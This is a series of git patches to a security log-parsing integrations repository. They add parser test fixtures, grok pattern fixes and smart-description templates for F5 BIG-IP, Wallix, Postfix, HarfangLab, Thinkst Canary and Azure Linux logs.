diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_2.json b/F5 Networks/f5-big-ip/tests/test_apm_access_2.json
new file mode 100644
index 000000000..f7f583da3
--- /dev/null
+++ b/F5 Networks/f5-big-ip/tests/test_apm_access_2.json	
@@ -0,0 +1,45 @@
+{
+  "input": {
+    "message": "Sep 11 07:55:17 test.test.com notice apmd[14311]: 01490005:5: /DMZ/APM_AIM_prod:DMZ:11111111: Following rule 'fallback' from item 'GONE API Variable Assign' to ending 'Allow'"
+  },
+  "expected": {
+    "message": "Sep 11 07:55:17 test.test.com notice apmd[14311]: 01490005:5: /DMZ/APM_AIM_prod:DMZ:11111111: Following rule 'fallback' from item 'GONE API Variable Assign' to ending 'Allow'",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "type": [
+        "info"
+      ]
+    },
+    "action": {
+      "target": "network-traffic"
+    },
+    "f5": {
+      "bigip": {
+        "apm": {
+          "rule_item": "GONE API Variable Assign"
+        }
+      }
+    },
+    "os": {
+      "family": "linux",
+      "platform": "linux"
+    },
+    "related": {
+      "hosts": [
+        "test.test.com"
+      ]
+    },
+    "rule": {
+      "name": "fallback"
+    },
+    "source": {
+      "address": "test.test.com",
+      "domain": "test.test.com",
+      "registered_domain": "test.com",
+      "subdomain": "test",
+      "top_level_domain": "com"
+    }
+  }
+}
\ No newline at end of file
diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_3.json b/F5 Networks/f5-big-ip/tests/test_apm_access_3.json
new file mode 100644
index 000000000..4b3b16a1f
--- /dev/null
+++ b/F5 Networks/f5-big-ip/tests/test_apm_access_3.json	
@@ -0,0 +1,44 @@
+{
+  "input": {
+    "message": "Sep 11 19:53:42 test.com notice apmd[14311]: 01490115:5: /VPN/APM_VPN_prod:VPN:11111111: Following rule 'fallback' from item 'AD Group Resource Assign' to terminalout 'Allow'"
+  },
+  "expected": {
+    "message": "Sep 11 19:53:42 test.com notice apmd[14311]: 01490115:5: /VPN/APM_VPN_prod:VPN:11111111: Following rule 'fallback' from item 'AD Group Resource Assign' to terminalout 'Allow'",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "type": [
+        "info"
+      ]
+    },
+    "action": {
+      "target": "network-traffic"
+    },
+    "f5": {
+      "bigip": {
+        "apm": {
+          "rule_item": "AD Group Resource Assign"
+        }
+      }
+    },
+    "os": {
+      "family": "linux",
+      "platform": "linux"
+    },
+    "related": {
+      "hosts": [
+        "test.com"
+      ]
+    },
+    "rule": {
+      "name": "fallback"
+    },
+    "source": {
+      "address": "test.com",
+      "domain": "test.com",
+      "registered_domain": "test.com",
+      "top_level_domain": "com"
+    }
+  }
+}
\ No newline at end of file
diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_4.json b/F5 Networks/f5-big-ip/tests/test_apm_access_4.json
new file mode 100644
index 000000000..d2b42ada9
--- /dev/null
+++ b/F5 Networks/f5-big-ip/tests/test_apm_access_4.json	
@@ -0,0 +1,44 @@
+{
+  "input": {
+    "message": "Sep 11 20:52:15 test.com notice apmd[14311]: 01490005:5: /DMZ/APM_ADSB_prod:DMZ:2c31fe0d: Following rule 'GONE API user' from item 'AD Query' to ending 'Allow'"
+  },
+  "expected": {
+    "message": "Sep 11 20:52:15 test.com notice apmd[14311]: 01490005:5: /DMZ/APM_ADSB_prod:DMZ:2c31fe0d: Following rule 'GONE API user' from item 'AD Query' to ending 'Allow'",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "type": [
+        "info"
+      ]
+    },
+    "action": {
+      "target": "network-traffic"
+    },
+    "f5": {
+      "bigip": {
+        "apm": {
+          "rule_item": "AD Query"
+        }
+      }
+    },
+    "os": {
+      "family": "linux",
+      "platform": "linux"
+    },
+    "related": {
+      "hosts": [
+        "test.com"
+      ]
+    },
+    "rule": {
+      "name": "GONE API user"
+    },
+    "source": {
+      "address": "test.com",
+      "domain": "test.com",
+      "registered_domain": "test.com",
+      "top_level_domain": "com"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json
index 39e8a6363..1c01481e9 100644
--- a/Wallix/wallix-bastion/tests/session_integrity.json
+++ b/Wallix/wallix-bastion/tests/session_integrity.json
@@ -6,13 +6,19 @@
     "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]",
     "event": {
       "action": "SSH_SHELL_SESSION",
-      "category": ["session"],
+      "category": [
+        "session"
+      ],
       "dataset": "session_integrity",
       "outcome": "failure",
-      "type": ["info"]
+      "type": [
+        "info"
+      ]
     },
     "related": {
-      "user": ["adm@CORP.NET@1.1.1.1"]
+      "user": [
+        "adm@CORP.NET@1.1.1.1"
+      ]
     },
     "user": {
       "name": "adm@CORP.NET@1.1.1.1"
@@ -21,4 +27,4 @@
       "type": "SSH_SHELL_SESSION"
     }
   }
-}
+}
\ No newline at end of file

From 723a83e9458c9252950833e6a8271e17df766287 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Tue, 8 Oct 2024 18:55:12 +0300
Subject: [PATCH 123/317] fix

---
 Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++----------
 1 file changed, 4 insertions(+), 10 deletions(-)

diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json
index 1c01481e9..39e8a6363 100644
--- a/Wallix/wallix-bastion/tests/session_integrity.json
+++ b/Wallix/wallix-bastion/tests/session_integrity.json
@@ -6,19 +6,13 @@
     "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]",
     "event": {
       "action": "SSH_SHELL_SESSION",
-      "category": [
-        "session"
-      ],
+      "category": ["session"],
       "dataset": "session_integrity",
       "outcome": "failure",
-      "type": [
-        "info"
-      ]
+      "type": ["info"]
     },
     "related": {
-      "user": [
-        "adm@CORP.NET@1.1.1.1"
-      ]
+      "user": ["adm@CORP.NET@1.1.1.1"]
     },
     "user": {
       "name": "adm@CORP.NET@1.1.1.1"
@@ -27,4 +21,4 @@
       "type": "SSH_SHELL_SESSION"
     }
   }
-}
\ No newline at end of file
+}

From 2f83058e40a8d9c1211327217aea557eb2ad4d02 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Tue, 8 Oct 2024 18:56:52 +0300
Subject: [PATCH 124/317] Apply linter

---
 F5 Networks/f5-big-ip/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml
index 01f4599e3..d59682c69 100644
--- a/F5 Networks/f5-big-ip/ingest/parser.yml	
+++ b/F5 Networks/f5-big-ip/ingest/parser.yml	
@@ -112,7 +112,7 @@ pipeline:
         output_field: message
         pattern: '%{HEADER}?%{DATA:rule_name}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{PAYLOAD}'
         custom_patterns:
-          HEADER: '%{HEADER_1}|%{HEADER_2}'
+          HEADER: "%{HEADER_1}|%{HEADER_2}"
           HEADER_1: '%{DATA:date} %{TIME:time} %{IPORHOST:source_domain} %{DATA:action_type} %{DATA}\[\d*\]:\s*(\d*:\d*: )'
           HEADER_2: '\s*%{WORD:action_type}\[\d*\]:\s*(\d*:\d*: )'
           PAYLOAD: "%{PAYLOAD_USER}|%{PAYLOAD_USER_AUTH_WITH_DOMAIN}|%{PAYLOAD_USER_AUTH}|%{PAYLOAD_NEW_SESSION}|%{PAYLOAD_ACCESS}"

From df157208e0d2a1879243e6dc48f83de466f9fdbb Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 8 Oct 2024 20:53:43 +0200
Subject: [PATCH 125/317] Postfix: addition of smart descriptions

---
 Postfix/postfix/_meta/smart-descriptions.json | 85 ++++++++++++++++++-
 1 file changed, 84 insertions(+), 1 deletion(-)

diff --git a/Postfix/postfix/_meta/smart-descriptions.json b/Postfix/postfix/_meta/smart-descriptions.json
index fe51488c7..14d83e7c2 100644
--- a/Postfix/postfix/_meta/smart-descriptions.json
+++ b/Postfix/postfix/_meta/smart-descriptions.json
@@ -1 +1,84 @@
-[]
+[
+    {
+        "value": "Event {event.category} of type {event.type} was raised. It is related to {source.ip}",
+        "conditions": [
+          {
+            "field": "source.ip"
+          },
+          {
+            "field": "event.category"
+          },
+          {
+            "field": "event.type"
+          }
+        ]
+    },
+    {
+        "value": "Event {event.category} of type {event.type} was raised from {source.address} to {destination.address}",
+        "conditions": [
+            {
+                "field": "source.address"
+            },
+            {
+                "field": "destination.address"
+            },
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.type"
+            }
+        ]
+    },
+    {
+        "value": "Event {event.category} of type {event.type} was raised with {event.outcome} from {source.address} to {destination.address}",
+        "conditions": [
+            {
+                "field": "source.address"
+            },
+            {
+                "field": "destination.address"
+            },
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.outcome"
+            },
+            {
+                "field": "event.type"
+            }
+        ]
+    },
+    {
+        "value": "Event {event.category} of type {event.type} was raised from {source.address} to {destination.address}. Reason: {event.reason}",
+        "conditions": [
+            {
+                "field": "source.address"
+            },
+            {
+                "field": "destination.address"
+            },
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.reason"
+            },
+            {
+                "field": "event.type"
+            }
+        ]
+    },
+    {
+        "value": "Event {event.category} of type {event.type} was raised.",
+        "conditions": [
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.type"
+            }
+        ]
+    }
+]

From 0122de8a390bb9a496dcaec65483745922fcfa16 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 8 Oct 2024 21:03:04 +0200
Subject: [PATCH 126/317] Addition of smartdesc

---
 Postfix/postfix/_meta/smart-descriptions.json | 80 ++++++++++++++++++-
 1 file changed, 78 insertions(+), 2 deletions(-)

diff --git a/Postfix/postfix/_meta/smart-descriptions.json b/Postfix/postfix/_meta/smart-descriptions.json
index 14d83e7c2..677e281ca 100644
--- a/Postfix/postfix/_meta/smart-descriptions.json
+++ b/Postfix/postfix/_meta/smart-descriptions.json
@@ -1,9 +1,9 @@
 [
     {
-        "value": "Event {event.category} of type {event.type} was raised. It is related to {source.ip}",
+        "value": "Event {event.category} of type {event.type} was raised. It is related to {source.address}",
         "conditions": [
           {
-            "field": "source.ip"
+            "field": "source.address"
           },
           {
             "field": "event.category"
@@ -13,6 +13,54 @@
           }
         ]
     },
+    {
+        "value": "Event {event.category} of type {event.type} was raised. It is related to {destination.address}",
+        "conditions": [
+          {
+            "field": "destination.address"
+          },
+          {
+            "field": "event.category"
+          },
+          {
+            "field": "event.type"
+          }
+        ]
+    },
+    {
+        "value": "Event {event.category} of type {event.type} was raised. It is related to {source.address}. Reason: {event.reason}",
+        "conditions": [
+          {
+            "field": "source.address"
+          },
+          {
+            "field": "event.category"
+          },
+          {
+            "field": "event.reason"
+          },
+          {
+            "field": "event.type"
+          }
+        ]
+    },
+    {
+        "value": "Event {event.category} of type {event.type} was raised. It is related to {destination.address}. Reason: {event.reason}",
+        "conditions": [
+          {
+            "field": "destination.address"
+          },
+          {
+            "field": "event.category"
+          },
+          {
+            "field": "event.reason"
+          },
+          {
+            "field": "event.type"
+          }
+        ]
+    },
     {
         "value": "Event {event.category} of type {event.type} was raised from {source.address} to {destination.address}",
         "conditions": [
@@ -70,6 +118,34 @@
             }
         ]
     },
+    {
+        "value": "Event {event.category} of type {event.type} was raised. Email message ID: {email.message_id}",
+        "conditions": [
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.type"
+            },
+            {
+                "field": "email.message_id"
+            }
+        ]
+    },
+    {
+        "value": "Event {event.category} of type {event.type} was raised. Reason: {event.reason}",
+        "conditions": [
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.reason"
+            },
+            {
+                "field": "event.type"
+            }
+        ]
+    },
     {
         "value": "Event {event.category} of type {event.type} was raised.",
         "conditions": [

From 64c7754347e8d6145868cfd047d1b665ed8316e0 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 8 Oct 2024 21:06:25 +0200
Subject: [PATCH 127/317] Adding a smart description

---
 Postfix/postfix/_meta/smart-descriptions.json | 23 +++++++++++++++++++
 1 file changed, 23 insertions(+)

diff --git a/Postfix/postfix/_meta/smart-descriptions.json b/Postfix/postfix/_meta/smart-descriptions.json
index 677e281ca..76f7c4902 100644
--- a/Postfix/postfix/_meta/smart-descriptions.json
+++ b/Postfix/postfix/_meta/smart-descriptions.json
@@ -118,6 +118,29 @@
             }
         ]
     },
+    {
+        "value": "Event {event.category} of type {event.type} was raised with {event.outcome} from {source.address} to {destination.address}.  Reason: {event.reason}",
+        "conditions": [
+            {
+                "field": "source.address"
+            },
+            {
+                "field": "destination.address"
+            },
+            {
+                "field": "event.category"
+            },
+            {
+                "field": "event.outcome"
+            },
+            {
+                "field": "event.reason"
+            },
+            {
+                "field": "event.type"
+            }
+        ]
+    },
     {
         "value": "Event {event.category} of type {event.type} was raised. Email message ID: {email.message_id}",
         "conditions": [

From cfde7fb1ee58899e3642f6c65ec180706cd2e2c2 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 9 Oct 2024 09:02:07 +0200
Subject: [PATCH 128/317] fix(Harfanglab): optimize grok pattern

---
 HarfangLab/harfanglab/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index e9a5e43fd..7ff16f6df 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -36,7 +36,7 @@ pipeline:
       properties:
         input_field: "{{json_event.message.event_data.MemberName}}"
         output_field: message
-        pattern: "(%{DATA:cn}=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})"
+        pattern: "([Cc][Nn]=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})"
 
   - name: agent_info
 

From 63a3880ddea5893b5676a78e8ad01b1fc5c24cdf Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 10 Oct 2024 15:49:15 +0200
Subject: [PATCH 129/317] Addition of missing smart descriptions

---
 .../azure-linux/_meta/smart-descriptions.json | 22 ++++++++++++++++++-
 1 file changed, 21 insertions(+), 1 deletion(-)

diff --git a/Azure/azure-linux/_meta/smart-descriptions.json b/Azure/azure-linux/_meta/smart-descriptions.json
index fe51488c7..c6298b1b4 100644
--- a/Azure/azure-linux/_meta/smart-descriptions.json
+++ b/Azure/azure-linux/_meta/smart-descriptions.json
@@ -1 +1,21 @@
-[]
+[
+    {
+        "value": "{azure_linux.message}",
+        "conditions": [
+            {
+                "field": "azure_linux.message"
+            }
+        ]
+    },
+    {
+        "value": "{azure_linux.message} at {@timestamp}",
+        "conditions": [
+            {
+                "field": "azure_linux.message"
+            },
+            {
+                "field": "@timestamp"
+            }
+        ]
+    }
+]

From 32353c71d7e05948ca036f9c2de8635d55de91de Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Thu, 10 Oct 2024 15:51:20 +0200
Subject: [PATCH 130/317] improve source ip field

---
 .../thinkst-canary/ingest/parser.yml          | 14 ++++++-
 .../thinkst-canary/tests/test_incident.json   |  9 ++++
 .../thinkst-canary/tests/test_ip_field.json   | 41 +++++++++++++++++++
 3 files changed, 62 insertions(+), 2 deletions(-)
 create mode 100644 ThinkstCanary/thinkst-canary/tests/test_ip_field.json

diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml
index 13b495443..8d08b9851 100644
--- a/ThinkstCanary/thinkst-canary/ingest/parser.yml
+++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml
@@ -8,6 +8,14 @@ pipeline:
         input_field: "{{original.message}}"
         output_field: message
 
+  - name: parsed_incident_field
+    external:
+      name: grok.match
+      properties:
+        input_field: "{{parsed_event.message.incident_id}}"
+        output_field: message
+        pattern: "(incident:%{WORD:event_type}:%{DATA:token_id}:%{IP:ip_address}:%{NUMBER:timestamp})"
+
   - name: parsed_dn
     filter: "{{parsed_event.get('DN') != None}}"
     external:
@@ -52,8 +60,10 @@ stages:
         filter: "{{parsed_event.message.dst_host_public_ip | is_ipaddress}}"
 
       - set:
-          source.ip: "{{parsed_event.message.src_host}}"
-        filter: "{{parsed_event.message.src_host | is_ipaddress}}"
+        #   source.ip: "{{parsed_event.message.src_host or parsed_incident_field.message.ip_address}}"
+        # filter: "{{parsed_event.message.src_host | is_ipaddress or parsed_incident_field.message.ip_address | is_ipaddress}}"
+          source.ip: "{{parsed_event.message.src_host or parsed_incident_field.message.ip_address}}"
+        filter: "{{parsed_event.message.src_host | is_ipaddress or parsed_incident_field.message.ip_address | is_ipaddress}}"
 
       - set:
           destination.domain: "{{parsed_event.message.HOST or parsed_event.message.hostname or parsed_event.message.HOSTNAME}}"
diff --git a/ThinkstCanary/thinkst-canary/tests/test_incident.json b/ThinkstCanary/thinkst-canary/tests/test_incident.json
index 4ed785905..80d796dbe 100644
--- a/ThinkstCanary/thinkst-canary/tests/test_incident.json
+++ b/ThinkstCanary/thinkst-canary/tests/test_incident.json
@@ -19,6 +19,15 @@
       "product": "Thinkst Canary",
       "vendor": "Thinkst Canary"
     },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
     "thinkst_canary": {
       "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212"
     }
diff --git a/ThinkstCanary/thinkst-canary/tests/test_ip_field.json b/ThinkstCanary/thinkst-canary/tests/test_ip_field.json
new file mode 100644
index 000000000..b96beea43
--- /dev/null
+++ b/ThinkstCanary/thinkst-canary/tests/test_ip_field.json
@@ -0,0 +1,41 @@
+{
+  "input": {
+    "message": "{\"incident_id\":\"incident:rdplogin:144444cff2d13e844444444444:1.2.3.4:1111497485\",\"event_type\":\"incident\",\"summary\":\"RDP Login Attempt\",\"timestamp\":\"1111497485\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Thinkst Canary [BETA]",
+        "dialect_uuid": "89346697-b64b-45d4-a456-72fd8a2be5d8"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"incident_id\":\"incident:rdplogin:144444cff2d13e844444444444:1.2.3.4:1111497485\",\"event_type\":\"incident\",\"summary\":\"RDP Login Attempt\",\"timestamp\":\"1111497485\"}",
+    "event": {
+      "category": [
+        "intrusion_detection"
+      ],
+      "kind": "alert",
+      "reason": "RDP Login Attempt",
+      "type": [
+        "denied"
+      ]
+    },
+    "@timestamp": "2005-03-22T13:18:05Z",
+    "observer": {
+      "product": "Thinkst Canary",
+      "vendor": "Thinkst Canary"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "thinkst_canary": {
+      "incident_id": "incident:rdplogin:144444cff2d13e844444444444:1.2.3.4:1111497485"
+    }
+  }
+}
\ No newline at end of file

From 77c4de8f4f5b9a17e498a75f2915408fe392ec60 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 10 Oct 2024 15:53:37 +0200
Subject: [PATCH 131/317] fix on AzureLinux smart descriptions

---
 Azure/azure-linux/_meta/smart-descriptions.json | 11 -----------
 1 file changed, 11 deletions(-)

diff --git a/Azure/azure-linux/_meta/smart-descriptions.json b/Azure/azure-linux/_meta/smart-descriptions.json
index c6298b1b4..5fbbd554c 100644
--- a/Azure/azure-linux/_meta/smart-descriptions.json
+++ b/Azure/azure-linux/_meta/smart-descriptions.json
@@ -6,16 +6,5 @@
                 "field": "azure_linux.message"
             }
         ]
-    },
-    {
-        "value": "{azure_linux.message} at {@timestamp}",
-        "conditions": [
-            {
-                "field": "azure_linux.message"
-            },
-            {
-                "field": "@timestamp"
-            }
-        ]
     }
 ]

From 76b055696774dbeed26f04f4f2be56a645c71ac6 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Thu, 10 Oct 2024 15:55:32 +0200
Subject: [PATCH 132/317] Delete comments

---
 ThinkstCanary/thinkst-canary/ingest/parser.yml | 2 --
 1 file changed, 2 deletions(-)

diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml
index 8d08b9851..f8cada9ff 100644
--- a/ThinkstCanary/thinkst-canary/ingest/parser.yml
+++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml
@@ -60,8 +60,6 @@ stages:
         filter: "{{parsed_event.message.dst_host_public_ip | is_ipaddress}}"
 
       - set:
-        #   source.ip: "{{parsed_event.message.src_host or parsed_incident_field.message.ip_address}}"
-        # filter: "{{parsed_event.message.src_host | is_ipaddress or parsed_incident_field.message.ip_address | is_ipaddress}}"
           source.ip: "{{parsed_event.message.src_host or parsed_incident_field.message.ip_address}}"
         filter: "{{parsed_event.message.src_host | is_ipaddress or parsed_incident_field.message.ip_address | is_ipaddress}}"
 

From bcacf3976acd34b1ba95ee6bdb22251d7847dbe5 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 10 Oct 2024 15:55:59 +0200
Subject: [PATCH 133/317] Enhanced smart descriptions for azure linux

---
 Azure/azure-linux/_meta/smart-descriptions.json | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/Azure/azure-linux/_meta/smart-descriptions.json b/Azure/azure-linux/_meta/smart-descriptions.json
index 5fbbd554c..cdefa7919 100644
--- a/Azure/azure-linux/_meta/smart-descriptions.json
+++ b/Azure/azure-linux/_meta/smart-descriptions.json
@@ -1,4 +1,18 @@
 [
+    {
+        "value": "{log.level} log received on {log.hostname}: {azure_linux.message}",
+        "conditions": [
+            {
+                "field": "azure_linux.message"
+            },
+            {
+                "field": "log.level"
+            },
+            {
+                "field": "log.hostname"
+            }
+        ]
+    },
     {
         "value": "{azure_linux.message}",
         "conditions": [

From 370154320193a952f18c9c004b1859aa6ee25ff2 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 10 Oct 2024 15:58:53 +0200
Subject: [PATCH 134/317] Updated tests for Azure Linux

---
 Azure/azure-linux/tests/auth_conversation_failed.json | 3 ---
 Azure/azure-linux/tests/auth_no_identity.json         | 3 ---
 Azure/azure-linux/tests/cron_command1.json            | 3 ---
 Azure/azure-linux/tests/cron_command2.json            | 3 ---
 Azure/azure-linux/tests/disconnected.json             | 3 ---
 Azure/azure-linux/tests/omsagent_command.json         | 3 ---
 Azure/azure-linux/tests/omsagent_command2.json        | 3 ---
 Azure/azure-linux/tests/session_closed.json           | 3 ---
 Azure/azure-linux/tests/session_opened.json           | 3 ---
 Azure/azure-linux/tests/systemd_session.json          | 3 ---
 10 files changed, 30 deletions(-)

diff --git a/Azure/azure-linux/tests/auth_conversation_failed.json b/Azure/azure-linux/tests/auth_conversation_failed.json
index c1ea1f581..5a761c66d 100644
--- a/Azure/azure-linux/tests/auth_conversation_failed.json
+++ b/Azure/azure-linux/tests/auth_conversation_failed.json
@@ -16,9 +16,6 @@
     "azure_linux": {
       "message": "pam_unix(sudo:auth): conversation failed"
     },
-    "host": {
-      "name": "LinuxRedhatDesktop"
-    },
     "log": {
       "hostname": "LinuxRedhatDesktop",
       "level": "error"
diff --git a/Azure/azure-linux/tests/auth_no_identity.json b/Azure/azure-linux/tests/auth_no_identity.json
index d1234db03..1da5be28d 100644
--- a/Azure/azure-linux/tests/auth_no_identity.json
+++ b/Azure/azure-linux/tests/auth_no_identity.json
@@ -16,9 +16,6 @@
     "azure_linux": {
       "message": "pam_unix(sudo:auth): auth could not identify password for [omsagent]"
     },
-    "host": {
-      "name": "LinuxRedhatDesktop"
-    },
     "log": {
       "hostname": "LinuxRedhatDesktop",
       "level": "critical"
diff --git a/Azure/azure-linux/tests/cron_command1.json b/Azure/azure-linux/tests/cron_command1.json
index 875c249f6..eef0c8095 100644
--- a/Azure/azure-linux/tests/cron_command1.json
+++ b/Azure/azure-linux/tests/cron_command1.json
@@ -8,9 +8,6 @@
     "azure_linux": {
       "message": "(root) CMD (/usr/lib64/sa/sa1 1 1)"
     },
-    "host": {
-      "name": "LinuxRedhatDesktop"
-    },
     "log": {
       "hostname": "LinuxRedhatDesktop",
       "level": "info"
diff --git a/Azure/azure-linux/tests/cron_command2.json b/Azure/azure-linux/tests/cron_command2.json
index 18e95f8fc..b7cc4940a 100644
--- a/Azure/azure-linux/tests/cron_command2.json
+++ b/Azure/azure-linux/tests/cron_command2.json
@@ -8,9 +8,6 @@
     "azure_linux": {
       "message": "(root) CMD ([ -f /etc/krb5.keytab ] && [ \\( ! -f /etc/opt/omi/creds/omi.keytab \\) -o \\( /etc/krb5.keytab -nt /etc/opt/omi/creds/omi.keytab \\) ] && /opt/omi/bin/support/ktstrip /etc/krb5.keytab /etc/opt/omi/creds/omi.keytab >/dev/null 2>&1 || true)"
     },
-    "host": {
-      "name": "LinuxRedhatDesktop"
-    },
     "log": {
       "hostname": "LinuxRedhatDesktop",
       "level": "info"
diff --git a/Azure/azure-linux/tests/disconnected.json b/Azure/azure-linux/tests/disconnected.json
index afe8c9ff9..a845afb3b 100644
--- a/Azure/azure-linux/tests/disconnected.json
+++ b/Azure/azure-linux/tests/disconnected.json
@@ -8,9 +8,6 @@
     "azure_linux": {
       "message": "Received disconnect from 185.122.161.248 port 39070:11: disconnected by user"
     },
-    "host": {
-      "name": "LinuxRedhatDesktop"
-    },
     "log": {
       "hostname": "LinuxRedhatDesktop",
       "level": "info"
diff --git a/Azure/azure-linux/tests/omsagent_command.json b/Azure/azure-linux/tests/omsagent_command.json
index 6ab82e12e..9b96a06aa 100644
--- a/Azure/azure-linux/tests/omsagent_command.json
+++ b/Azure/azure-linux/tests/omsagent_command.json
@@ -14,9 +14,6 @@
     "azure_linux": {
       "message": "omsagent : TTY=unknown ; PWD=/opt/microsoft/omsconfig/Scripts/2.6x-2.7x ; USER=root ; COMMAND=/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh"
     },
-    "host": {
-      "name": "LinuxRedhatDesktop"
-    },
     "log": {
       "hostname": "LinuxRedhatDesktop",
       "level": "info"
diff --git a/Azure/azure-linux/tests/omsagent_command2.json b/Azure/azure-linux/tests/omsagent_command2.json
index c4bc6f554..8839131bd 100644
--- a/Azure/azure-linux/tests/omsagent_command2.json
+++ b/Azure/azure-linux/tests/omsagent_command2.json
@@ -14,9 +14,6 @@
     "azure_linux": {
       "message": "omsagent : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/test -r /var/lib/docker/containers/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16-json.log"
     },
-    "host": {
-      "name": "LinuxRedhatDesktop"
-    },
     "log": {
       "hostname": "LinuxRedhatDesktop",
       "level": "info"
diff --git a/Azure/azure-linux/tests/session_closed.json b/Azure/azure-linux/tests/session_closed.json
index 9bd908a00..824820fff 100644
--- a/Azure/azure-linux/tests/session_closed.json
+++ b/Azure/azure-linux/tests/session_closed.json
@@ -16,9 +16,6 @@
     "azure_linux": {
       "message": "pam_unix(sudo:session): session closed for user root"
     },
-    "host": {
-      "name": "LinuxRedhatDesktop"
-    },
     "log": {
       "hostname": "LinuxRedhatDesktop",
       "level": "info"
diff --git a/Azure/azure-linux/tests/session_opened.json b/Azure/azure-linux/tests/session_opened.json
index 3d4effdb7..217cca4c3 100644
--- a/Azure/azure-linux/tests/session_opened.json
+++ b/Azure/azure-linux/tests/session_opened.json
@@ -16,9 +16,6 @@
     "azure_linux": {
       "message": "pam_unix(sudo:session): session opened for user root by (uid=0)"
     },
-    "host": {
-      "name": "LinuxRedhatDesktop"
-    },
     "log": {
       "hostname": "LinuxRedhatDesktop",
       "level": "info"
diff --git a/Azure/azure-linux/tests/systemd_session.json b/Azure/azure-linux/tests/systemd_session.json
index 37cfb75f3..b84c4700d 100644
--- a/Azure/azure-linux/tests/systemd_session.json
+++ b/Azure/azure-linux/tests/systemd_session.json
@@ -16,9 +16,6 @@
     "azure_linux": {
       "message": "Started Session 13124 of user omsagent."
     },
-    "host": {
-      "name": "LinuxRedhatDesktop"
-    },
     "log": {
       "hostname": "LinuxRedhatDesktop",
       "level": "info"

From c5aadb611517017702d13872911946b05f1b4832 Mon Sep 17 00:00:00 2001
